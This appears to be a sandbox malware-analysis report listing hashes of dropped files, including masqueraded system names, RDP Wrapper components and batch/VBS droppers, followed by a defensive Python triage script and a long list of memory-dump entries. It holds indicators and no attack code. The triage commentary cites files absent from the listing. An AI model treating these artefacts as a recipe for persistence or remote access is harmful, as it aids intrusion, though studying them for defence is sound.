    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\Programdata\Windows\install.bat

    MD5

    db76c882184e8d2bac56865c8e88f8fd

    SHA1

    fc6324751da75b665f82a3ad0dcc36bf4b91dfac

    SHA256

    e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a

    SHA512

    da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

  • C:\Programdata\kz.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Programdata\lsass.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Programdata\lsass2.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Programdata\olly.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Programdata\script.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

    MD5

    0315d10142a4feba3e9f2f81bb76aa4d

    SHA1

    1443a18f34a875fe27070d6170f6076c1d36222d

    SHA256

    aab1424230ff5fbb3c2d1f807fed669149b4cf289a9279451d87ac1003f0f644

    SHA512

    a7ebf3df01eca93354a6bc3d3ae172c01ba47919a0d993a6b077ee16523fcdc77d474fa2435c786f7a6e652c9425defa9bdc6c32a18599b5c58972c9e1cb0407

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

    MD5

    c7d3998ff4faffb34978b15933bc9718

    SHA1

    752ecadefd93b8a20e50eebae6a76e211c691eb0

    SHA256

    dc6238f4a90c3e77537fd2d9b12f97bedfc6ca3758de193bfc9e0ffad62d0974

    SHA512

    7698f66ace34995608d97581aa9511ab832cbe51c667a0a5a8357a3042481fcc0978e97fb95243126398129bcec5a6cd751e1a97ba6a6dfd8ec15a4362f6d22b

  • C:\Windows\SysWOW64\drivers\conhost.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Windows\boy.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Windows\java.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\programdata\install\cheat.exe

    MD5

    0d18b4773db9f11a65f0b60c6cfa37b7

    SHA1

    4d4c1fe9bf8da8fe5075892d24664e70baf7196e

    SHA256

    e3d02b5bfcab47b86a2366ef37c3c872858b2e25ad5c5a4d1a5e49c2afaee673

    SHA512

    a607cf5d9dd1c7d8571a9e53fb65255b7c698c08e4f1115650ee08c476a0a7b75627a5b8cd93d8839a750def62dee465e6b947ecf4b875eda5d5e0cb9141a02c

  • C:\programdata\microsoft\intel\R8.exe

    MD5

    ad95d98c04a3c080df33ed75ad38870f

    SHA1

    abbb43f7b7c86d7917d4582e47245a40ca3f33c0

    SHA256

    40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

    SHA512

    964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

  • C:\programdata\microsoft\temp\H.bat

    MD5

    ec45b066a80416bdb06b264b7efed90d

    SHA1

    6679ed15133f13573c1448b5b16a4d83485e8cc9

    SHA256

    cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e

    SHA512

    0b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c

  • C:\programdata\microsoft\temp\Temp.bat

    MD5

    9380f21201174ac1267aa944e1096955

    SHA1

    e97bd59509694d057daaf698a933092f804fe2e3

    SHA256

    ccf47d036ccfe0c8d0fe2854d14ca21d99be5fa11d0fbb16edcc1d6c10de3512

    SHA512

    ff4d2172c75a90b1af183fddc483d7a6d908593cb47009f37818066dee021bf7172b8890502fb26d248d39479c6276dce120b570e31f43fcc616db4b43c67e27

  • C:\rdp\RDPWInst.exe

    MD5

    3288c284561055044c489567fd630ac2

    SHA1

    11ffeabbe42159e1365aa82463d8690c845ce7b7

    SHA256

    ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

    SHA512

    c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

  • C:\rdp\Rar.exe

    MD5

    2e86a9862257a0cf723ceef3868a1a12

    SHA1

    a4324281823f0800132bf13f5ad3860e6b5532c6

    SHA256

    2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8

    SHA512

    3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

  • C:\rdp\bat.bat

    MD5

    5835a14baab4ddde3da1a605b6d1837a

    SHA1

    94b73f97d5562816a4b4ad3041859c3cfcc326ea

    SHA256

    238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92

    SHA512

    d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e

  • C:\rdp\db.rar

    MD5

    462f221d1e2f31d564134388ce244753

    SHA1

    6b65372f40da0ca9cd1c032a191db067d40ff2e3

    SHA256

    534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432

    SHA512

    5e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086

  • C:\rdp\install.vbs

    MD5

    6d12ca172cdff9bcf34bab327dd2ab0d

    SHA1

    d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493

    SHA256

    f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec

    SHA512

    b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342

  • C:\rdp\pause.bat

    MD5

    a47b870196f7f1864ef7aa5779c54042

    SHA1

    dcb71b3e543cbd130a9ec47d4f847899d929b3d2

    SHA256

    46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba

    SHA512

    b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60

  • C:\rdp\run.vbs

    MD5

    6a5f5a48072a1adae96d2bd88848dcff

    SHA1

    b381fa864db6c521cbf1133a68acf1db4baa7005

    SHA256

    c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe

    SHA512

    d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

  • \??\PIPE\lsarpc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \??\c:\program files\rdp wrapper\rdpwrap.dll

    MD5

    461ade40b800ae80a40985594e1ac236

    SHA1

    b3892eef846c044a2b0785d54a432b3e93a968c8

    SHA256

    798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

    SHA512

    421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

  • \??\c:\program files\rdp wrapper\rdpwrap.ini

    MD5

    dddd741ab677bdac8dcd4fa0dda05da2

    SHA1

    69d328c70046029a1866fd440c3e4a63563200f9

    SHA256

    7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

    SHA512

    6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

  • \??\c:\windows\svchost.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \Program Files\RDP Wrapper\rdpwrap.dll

    MD5

    461ade40b800ae80a40985594e1ac236

    SHA1

    b3892eef846c044a2b0785d54a432b3e93a968c8

    SHA256

    798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

    SHA512

    421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

  • \Users\Admin\AppData\Local\Temp\CE87CE80\mozglue.dll

    MD5

    9e682f1eb98a9d41468fc3e50f907635

    SHA1

    85e0ceca36f657ddf6547aa0744f0855a27527ee

    SHA256

    830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d

    SHA512

    230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed

  • \Users\Admin\AppData\Local\Temp\CE87CE80\msvcp140.dll

    MD5

    109f0f02fd37c84bfc7508d4227d7ed5

    SHA1

    ef7420141bb15ac334d3964082361a460bfdb975

    SHA256

    334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

    SHA512

    46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

  • \Users\Admin\AppData\Local\Temp\CE87CE80\nss3.dll

    MD5

    556ea09421a0f74d31c4c0a89a70dc23

    SHA1

    f739ba9b548ee64b13eb434a3130406d23f836e3

    SHA256

    f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb

    SHA512

    2481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2

  • \Users\Admin\AppData\Local\Temp\CE87CE80\vcruntime140.dll

    MD5

    7587bf9cb4147022cd5681b015183046

    SHA1

    f2106306a8f6f0da5afb7fc765cfa0757ad5a628

    SHA256

    c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

    SHA512

    0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f
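
Two things in the listing above are easy to miss when the hashes are lifted straight into a blocklist. First, several entries (kz.exe, lsass.exe, lsass2.exe, olly.exe, script.exe, boy.exe, java.exe, conhost.exe under SysWOW64\drivers, svchost.exe under C:\Windows and the lsarpc pipe) carry d41d8cd98f00b204e9800998ecf8427e / e3b0c442…b855, which are the MD5 and SHA256 of empty input: the sandbox saw the file created but nothing written to it, so those digests match every zero-byte file on earth and must not be used as indicators. Second, the same content is listed once per write, and system binary names (lsass.exe, svchost.exe, winlogon.exe, taskhostw.exe, conhost.exe) appear under ProgramData and other directories where they do not belong, which is the masquerading a responder should hunt on instead. The script below is an added example, not part of the sandbox report: it parses the report's flattened path/label/digest layout, collapses repeated drops, flags zero-byte artifacts and misplaced system names, and emits the SHA256 values that remain usable. The sample input is a constructed excerpt using paths and digests copied from the listing; the set of system names and the allowed directory prefixes are illustrative assumptions.

```python
"""Triage a sandbox 'dropped files' listing: parse, de-duplicate, flag oddities."""
import hashlib
import re
from collections import OrderedDict

# Digests of empty input. A dropped file reported with these was created (or is a
# named pipe) but never written to, so its hash is useless as a hunting indicator.
EMPTY = {"md5": hashlib.md5(b"").hexdigest(), "sha256": hashlib.sha256(b"").hexdigest()}

# System binary names this report shows being written outside their home directory.
# Both the set and the allowed prefixes are illustrative assumptions, not a complete list.
SYSTEM_NAMES = {"lsass.exe", "svchost.exe", "conhost.exe", "winlogon.exe", "taskhostw.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

HASH_LABELS = {"MD5": "md5", "SHA1": "sha1", "SHA256": "sha256", "SHA512": "sha512"}

# Constructed excerpt in the report's own layout (paths and digests copied from the
# listing above; SHA1/SHA512 lines omitted for brevity, one duplicate drop kept on purpose).
SAMPLE = r"""
  • C:\Programdata\lsass.exe

    MD5
    d41d8cd98f00b204e9800998ecf8427e
    SHA256
    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  • C:\ProgramData\Windows\rutserv.exe
    MD5
    37a8802017a212bb7f5255abc7857969
    SHA256
    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
  • C:\ProgramData\Windows\rutserv.exe
    MD5
    37a8802017a212bb7f5255abc7857969
    SHA256
    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
  • C:\Programdata\RealtekHD\taskhostw.exe
    MD5
    73ca737af2c7168e9c926a27abf7a5b1
    SHA256
    99dec75b66a048341192c2baae3fe2c47fca801a21ca759bbb127908f97d11e2
  • \??\c:\windows\svchost.exe
    MD5
    d41d8cd98f00b204e9800998ecf8427e
    SHA256
    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""


def parse_dropped(text):
    """Turn the flattened 'path / label / digest' layout into a list of dicts."""
    records, current, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue  # the report separates every line with a blank one
        if line.startswith("•"):
            current = {"path": line[1:].strip()}
            records.append(current)
            pending = None
        elif line in HASH_LABELS:
            pending = HASH_LABELS[line]  # the next non-blank line is this digest
        elif pending and current is not None and re.fullmatch(r"[0-9a-f]{32,128}", line):
            current[pending] = line
            pending = None
    return records


def normalise(path):
    """Lower-case and strip the NT object-manager prefix so both path spellings compare equal."""
    p = path.lower()
    return p[4:] if p.startswith("\\??\\") else p


def dedupe(records):
    """Collapse repeated drops of identical content to the same path (the report lists each write)."""
    seen = OrderedDict()
    for r in records:
        seen.setdefault((normalise(r["path"]), r.get("sha256")), r)
    return list(seen.values())


def triage(records):
    """Return (path, reason) findings a responder would want to look at first."""
    findings = []
    for r in records:
        path = normalise(r["path"])
        name = path.rsplit("\\", 1)[-1]
        if all(r.get(k) == v for k, v in EMPTY.items()):
            findings.append((r["path"], "zero-byte artifact: digests are the empty-input hashes"))
        if name in SYSTEM_NAMES and not path.startswith(SYSTEM_DIRS):
            findings.append((r["path"], "system binary name outside System32/SysWOW64"))
    return findings


def hunt_hashes(records):
    """Unique SHA256 values worth pushing to a blocklist; empty-file digests are excluded."""
    return sorted({r["sha256"] for r in records if r.get("sha256") and r["sha256"] != EMPTY["sha256"]})


if __name__ == "__main__":
    recs = dedupe(parse_dropped(SAMPLE))
    for path, why in triage(recs):
        print(f"{why}: {path}")
    print("SHA256 to hunt:", *hunt_hashes(recs), sep="\n  ")
```

Run against the full listing, the same logic drops the repeated rutserv.exe, winit.exe, sys.exe, RDPWInst.exe and Rar.exe drops, excludes every empty-input digest, and leaves the path-based findings (system names under ProgramData or C:\Windows, the RDP Wrapper install under Program Files) as the indicators that survive a repack of the binaries.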

  • memory/200-375-0x0000000000000000-mapping.dmp

  • memory/352-455-0x0000000000000000-mapping.dmp

  • memory/400-627-0x0000000000000000-mapping.dmp

  • memory/496-625-0x0000000000000000-mapping.dmp

  • memory/508-770-0x0000000000000000-mapping.dmp

  • memory/556-594-0x0000000000000000-mapping.dmp

  • memory/556-658-0x0000000000000000-mapping.dmp

  • memory/556-412-0x0000000000000000-mapping.dmp

  • memory/640-428-0x0000000000000000-mapping.dmp

  • memory/648-745-0x0000000000000000-mapping.dmp

  • memory/724-463-0x0000000000000000-mapping.dmp

  • memory/728-394-0x0000000000000000-mapping.dmp

  • memory/728-402-0x0000000002DF0000-0x0000000002DF1000-memory.dmp

  • memory/728-404-0x00000000035F0000-0x00000000035F1000-memory.dmp

  • memory/748-954-0x0000000000000000-mapping.dmp

  • memory/812-888-0x0000000000000000-mapping.dmp

  • memory/940-553-0x0000000000000000-mapping.dmp

  • memory/968-570-0x0000000000000000-mapping.dmp

  • memory/976-408-0x0000000000000000-mapping.dmp

  • memory/988-405-0x0000000000000000-mapping.dmp

  • memory/992-547-0x0000000000000000-mapping.dmp

  • memory/1040-959-0x0000000000000000-mapping.dmp

  • memory/1124-569-0x0000000000000000-mapping.dmp

  • memory/1132-944-0x0000000000000000-mapping.dmp

  • memory/1140-371-0x0000000000000000-mapping.dmp

  • memory/1144-406-0x0000000000000000-mapping.dmp

  • memory/1220-840-0x0000000000000000-mapping.dmp

  • memory/1268-909-0x0000000000000000-mapping.dmp

  • memory/1308-674-0x0000000000000000-mapping.dmp

  • memory/1360-532-0x0000000000000000-mapping.dmp

  • memory/1384-572-0x0000000000000000-mapping.dmp

  • memory/1420-616-0x0000000000000000-mapping.dmp

  • memory/1444-679-0x0000000000000000-mapping.dmp

  • memory/1456-869-0x0000000000000000-mapping.dmp

  • memory/1520-719-0x0000000000000000-mapping.dmp

  • memory/1524-543-0x0000000000000000-mapping.dmp

  • memory/1560-652-0x0000000000000000-mapping.dmp

  • memory/1564-352-0x0000000000000000-mapping.dmp

  • memory/1640-942-0x0000000000000000-mapping.dmp

  • memory/1716-845-0x0000000000000000-mapping.dmp

  • memory/1736-747-0x0000000000000000-mapping.dmp

  • memory/1784-890-0x0000000000000000-mapping.dmp

  • memory/1796-963-0x0000000000000000-mapping.dmp

  • memory/1836-676-0x0000000000000000-mapping.dmp

  • memory/1892-850-0x0000000000000000-mapping.dmp

  • memory/1912-449-0x0000000000000000-mapping.dmp

  • memory/1960-537-0x0000000000000000-mapping.dmp

  • memory/2004-512-0x0000000000000000-mapping.dmp

  • memory/2004-545-0x0000000000000000-mapping.dmp

  • memory/2016-655-0x0000000000000000-mapping.dmp

  • memory/2032-950-0x0000000000000000-mapping.dmp

  • memory/2036-649-0x0000000000000000-mapping.dmp

  • memory/2056-456-0x0000000000000000-mapping.dmp

  • memory/2064-536-0x0000000000000000-mapping.dmp

  • memory/2076-809-0x0000000000000000-mapping.dmp

  • memory/2092-383-0x0000000000000000-mapping.dmp

  • memory/2128-433-0x0000000000000000-mapping.dmp

  • memory/2156-381-0x0000000002F30000-0x0000000002F31000-memory.dmp

  • memory/2156-380-0x0000000003730000-0x0000000003731000-memory.dmp

  • memory/2156-379-0x0000000002F30000-0x0000000002F31000-memory.dmp

  • memory/2156-376-0x0000000000000000-mapping.dmp

  • memory/2164-852-0x0000000000000000-mapping.dmp

  • memory/2260-644-0x0000000000000000-mapping.dmp

  • memory/2268-830-0x0000000000000000-mapping.dmp

  • memory/2284-407-0x0000000000000000-mapping.dmp

  • memory/2328-424-0x0000000000000000-mapping.dmp

  • memory/2412-395-0x0000000000000000-mapping.dmp

  • memory/2416-957-0x0000000000000000-mapping.dmp

  • memory/2500-912-0x0000000000000000-mapping.dmp

  • memory/2504-750-0x0000000000000000-mapping.dmp

  • memory/2508-546-0x0000000000000000-mapping.dmp

  • memory/2520-422-0x0000000000000000-mapping.dmp

  • memory/2536-847-0x0000000000000000-mapping.dmp

  • memory/2540-641-0x0000000000000000-mapping.dmp

  • memory/2544-601-0x0000000000000000-mapping.dmp

  • memory/2552-911-0x0000000000000000-mapping.dmp

  • memory/2564-628-0x0000000000000000-mapping.dmp

  • memory/2576-373-0x0000000000000000-mapping.dmp

  • memory/2584-432-0x0000000000000000-mapping.dmp

  • memory/2588-891-0x0000000000000000-mapping.dmp

  • memory/2596-939-0x0000000000000000-mapping.dmp

  • memory/2752-778-0x0000000000000000-mapping.dmp

  • memory/2784-843-0x0000000000000000-mapping.dmp

  • memory/2796-808-0x0000000000000000-mapping.dmp

  • memory/2844-608-0x0000000000000000-mapping.dmp

  • memory/2860-584-0x0000000000000000-mapping.dmp

  • memory/2896-938-0x0000000000000000-mapping.dmp

  • memory/2900-958-0x0000000000000000-mapping.dmp

  • memory/2944-646-0x0000000000000000-mapping.dmp

  • memory/2968-409-0x0000000000000000-mapping.dmp

  • memory/3040-974-0x0000000000000000-mapping.dmp

  • memory/3096-435-0x0000000000000000-mapping.dmp

  • memory/3140-872-0x0000000000000000-mapping.dmp

  • memory/3172-508-0x0000000000000000-mapping.dmp

  • memory/3176-565-0x0000000000000000-mapping.dmp

  • memory/3192-431-0x0000000000000000-mapping.dmp

  • memory/3268-367-0x0000000000000000-mapping.dmp

  • memory/3296-510-0x0000000000000000-mapping.dmp

  • memory/3396-541-0x0000000000000000-mapping.dmp

  • memory/3400-465-0x0000000000000000-mapping.dmp

  • memory/3500-453-0x0000000000000000-mapping.dmp

  • memory/3596-571-0x0000000000000000-mapping.dmp

  • memory/3600-581-0x0000000000000000-mapping.dmp

  • memory/3672-853-0x0000000000000000-mapping.dmp

  • memory/3692-348-0x0000000000000000-mapping.dmp

  • memory/3692-351-0x0000000002BD0000-0x0000000002BD1000-memory.dmp

  • memory/3816-542-0x0000000000000000-mapping.dmp

  • memory/3860-533-0x0000000000000000-mapping.dmp

  • memory/3892-538-0x0000000000000000-mapping.dmp

  • memory/3912-833-0x0000000000000000-mapping.dmp

  • memory/3924-624-0x0000000000000000-mapping.dmp

  • memory/3952-595-0x0000000000000000-mapping.dmp

  • memory/3956-403-0x0000000000000000-mapping.dmp

  • memory/3964-464-0x0000000000000000-mapping.dmp

  • memory/3976-385-0x0000000000000000-mapping.dmp

  • memory/3996-680-0x0000000000000000-mapping.dmp

  • memory/4032-368-0x0000000000000000-mapping.dmp

  • memory/4040-893-0x0000000000000000-mapping.dmp

  • memory/4048-544-0x0000000000000000-mapping.dmp

  • memory/4052-836-0x0000000000000000-mapping.dmp

  • memory/4064-596-0x0000000000000000-mapping.dmp

  • memory/4080-388-0x0000000000000000-mapping.dmp

  • memory/4084-425-0x0000000000000000-mapping.dmp

  • memory/4088-427-0x0000000000000000-mapping.dmp

  • memory/4100-509-0x0000000000000000-mapping.dmp

  • memory/4108-612-0x0000000000000000-mapping.dmp

  • memory/4116-568-0x0000000000000000-mapping.dmp

  • memory/4124-511-0x0000000000000000-mapping.dmp

  • memory/4140-513-0x0000000000000000-mapping.dmp

  • memory/4148-870-0x0000000000000000-mapping.dmp

  • memory/4192-632-0x0000000000000000-mapping.dmp

  • memory/4196-617-0x0000000000000000-mapping.dmp

  • memory/4200-818-0x0000000000000000-mapping.dmp

  • memory/4208-548-0x0000000000000000-mapping.dmp

  • memory/4212-780-0x0000000000000000-mapping.dmp

  • memory/4216-672-0x0000000000000000-mapping.dmp

  • memory/4220-638-0x0000000000000000-mapping.dmp

  • memory/4228-514-0x0000000000000000-mapping.dmp

  • memory/4232-879-0x0000000000000000-mapping.dmp

  • memory/4236-475-0x0000000000000000-mapping.dmp

  • memory/4240-714-0x0000000000000000-mapping.dmp

  • memory/4248-476-0x0000000000000000-mapping.dmp

  • memory/4252-622-0x0000000000000000-mapping.dmp

  • memory/4256-634-0x0000000000000000-mapping.dmp

  • memory/4260-650-0x0000000000000000-mapping.dmp

  • memory/4264-607-0x0000000000000000-mapping.dmp

  • memory/4268-598-0x0000000000000000-mapping.dmp

  • memory/4272-589-0x0000000000000000-mapping.dmp

  • memory/4276-710-0x0000000000000000-mapping.dmp

  • memory/4280-902-0x0000000000000000-mapping.dmp

  • memory/4284-576-0x0000000000000000-mapping.dmp

  • memory/4288-517-0x0000000000000000-mapping.dmp

  • memory/4292-661-0x0000000000000000-mapping.dmp

  • memory/4296-481-0x0000000000000000-mapping.dmp

  • memory/4304-643-0x0000000000000000-mapping.dmp

  • memory/4308-574-0x0000000000000000-mapping.dmp

  • memory/4312-552-0x0000000000000000-mapping.dmp

  • memory/4320-947-0x0000000000000000-mapping.dmp

  • memory/4324-519-0x0000000000000000-mapping.dmp

  • memory/4332-713-0x0000000000000000-mapping.dmp

  • memory/4336-670-0x0000000000000000-mapping.dmp

  • memory/4340-779-0x0000000000000000-mapping.dmp

  • memory/4344-656-0x0000000000000000-mapping.dmp

  • memory/4348-482-0x0000000000000000-mapping.dmp

  • memory/4356-708-0x0000000000000000-mapping.dmp

  • memory/4368-579-0x0000000000000000-mapping.dmp

  • memory/4372-590-0x0000000000000000-mapping.dmp

  • memory/4376-549-0x0000000000000000-mapping.dmp

  • memory/4380-516-0x0000000000000000-mapping.dmp

  • memory/4384-854-0x0000000000000000-mapping.dmp

  • memory/4388-483-0x0000000000000000-mapping.dmp

  • memory/4396-875-0x0000000000000000-mapping.dmp

  • memory/4396-518-0x0000000000000000-mapping.dmp

  • memory/4400-829-0x0000000000000000-mapping.dmp

  • memory/4404-575-0x0000000000000000-mapping.dmp

  • memory/4408-709-0x0000000000000000-mapping.dmp

  • memory/4412-777-0x0000000000000000-mapping.dmp

  • memory/4416-677-0x0000000000000000-mapping.dmp

  • memory/4420-585-0x0000000000000000-mapping.dmp

  • memory/4424-551-0x0000000000000000-mapping.dmp

  • memory/4428-550-0x0000000000000000-mapping.dmp

  • memory/4436-669-0x0000000000000000-mapping.dmp

  • memory/4444-782-0x0000000000000000-mapping.dmp

  • memory/4452-555-0x0000000000000000-mapping.dmp

  • memory/4456-486-0x0000000000000000-mapping.dmp

  • memory/4460-609-0x0000000000000000-mapping.dmp

  • memory/4464-673-0x0000000000000000-mapping.dmp

  • memory/4472-554-0x0000000000000000-mapping.dmp

  • memory/4476-580-0x0000000000000000-mapping.dmp

  • memory/4480-610-0x0000000000000000-mapping.dmp

  • memory/4484-712-0x0000000000000000-mapping.dmp

  • memory/4488-591-0x0000000000000000-mapping.dmp

  • memory/4492-619-0x0000000000000000-mapping.dmp

  • memory/4496-663-0x0000000000000000-mapping.dmp

  • memory/4504-487-0x0000000000000000-mapping.dmp

  • memory/4508-623-0x0000000000000000-mapping.dmp

  • memory/4512-520-0x0000000000000000-mapping.dmp

  • memory/4516-522-0x0000000000000000-mapping.dmp

  • memory/4520-629-0x0000000000000000-mapping.dmp

  • memory/4524-807-0x0000000000000000-mapping.dmp

  • memory/4528-599-0x0000000000000000-mapping.dmp

